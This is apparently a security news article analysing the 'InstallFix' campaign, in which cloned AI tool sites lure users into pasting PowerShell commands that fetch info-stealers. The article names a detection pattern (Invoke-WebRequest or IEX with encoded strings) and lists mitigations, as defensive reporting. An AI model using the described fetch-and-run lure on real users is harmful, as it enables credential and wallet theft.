InstallFix Campaign: Cloned AI Tool Sites Distribute Info-Stealers

Overview of the InstallFix Malware Campaign

According to SecurityWeek, threat actors are leveraging the immense popularity of generative AI tools to lure victims into a sophisticated malware distribution scheme. The “InstallFix” campaign relies on high-quality clones of legitimate AI software websites, such as those for Midjourney, OpenAI’s Sora, and various ChatGPT-adjacent utilities. Unlike traditional Phishing that focuses on credential harvesting through fake login forms, this campaign employs a deceptive technical support workflow to bypass standard security filters.

The primary objective of the InstallFix campaign is the deployment of info-stealing malware, which targets sensitive data including browser-stored passwords, session cookies, and cryptocurrency wallet configurations. By impersonating trusted AI brands, the attackers capitalize on the user’s desire to access gated or high-performance AI models, often leading them to ignore security warnings in favor of “fixing” a supposed installation error.

Technical Analysis: The Copy-Paste Infection Chain

The infection chain begins when a user navigates to a malicious clone of a popular AI tool site, often arriving via malicious advertisements or SEO poisoning. Once on the site, the user is typically presented with a download button or an “Install Now” prompt. When the user attempts to interact with the site, a simulated error message appears, suggesting that the installation has failed due to a system incompatibility or missing component.

How to detect malicious PowerShell commands from cloned sites

To “fix” the error, the website provides a seemingly helpful technical solution: a PowerShell command that the user is instructed to copy and paste directly into their terminal. This TTP is particularly effective because it bypasses EDR solutions that focus on file-based threats by utilizing “living-off-the-land” techniques. The provided command is usually an obfuscated script designed to download a secondary payload from a remote C2 server.

Security professionals looking for how to detect malicious PowerShell commands from cloned sites should monitor for PowerShell execution patterns that include Invoke-WebRequest (IWR) or IEX (Invoke-Expression) immediately followed by encoded strings. The InstallFix campaign specifically uses these commands to pull down executable files disguised as legitimate system updates or installers.

InstallFix Malware Campaign Analysis: Payload and Impact

The payloads delivered in this campaign are predominantly well-known info-stealers, such as Lumma Stealer and Vidar. These malware families are designed to rapidly exfiltrate data before self-terminating or hiding. Once the PowerShell command is executed, the malware gathers:

• Browser credentials and autofill data.
• Files containing sensitive keywords (e.g., “wallet”, “password”, “backup”).
• Multi-factor authentication (MFA) session tokens, which can allow attackers to bypass secondary security layers.

An InstallFix malware campaign analysis reveals that the attackers are not just targeting individual hobbyists but also corporate employees looking to use AI tools for work. This introduces a significant risk of corporate account takeover and subsequent Lateral Movement within a compromised network. The use of PowerShell as the delivery mechanism makes this threat particularly dangerous in environments where command-line execution is not strictly audited by the SOC.

Defensive Strategies and AI Tool Website Impersonation Protection

Mitigating the risks associated with the InstallFix campaign requires a multi-layered approach that combines technical controls with user awareness. Organizations must prioritize AI tool website impersonation protection by implementing strict web filtering and DNS-level blocking for newly registered domains that mimic popular AI service providers.

Mitigation Steps for Security Teams

• Restrict PowerShell Execution: Implement Constrained Language Mode or use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unassigned scripts.
• Enhance Endpoint Visibility: Configure Advanced Audit Policy Configuration to log PowerShell Script Block Logging (Event ID 4104). This allows the SIEM to flag suspicious commands containing Base64 encoded strings or network-reaching functions.
• User Education: Train staff to never copy and paste commands from external websites into their terminal, regardless of the perceived error message. Legitimate software providers rarely require manual CLI commands to “fix” a standard installation.
• Credential Hygiene: Ensure that all high-value accounts are protected by hardware-based MFA, which is more resilient against the session token theft performed by info-stealers.

By mapping these activities to the MITRE ATT&CK framework, specifically T1059.001 (Command and Scripting Interpreter: PowerShell) and T1204.001 (User Execution: Malicious Link), defenders can develop more IoC signatures to identify and block the InstallFix campaign before data exfiltration occurs.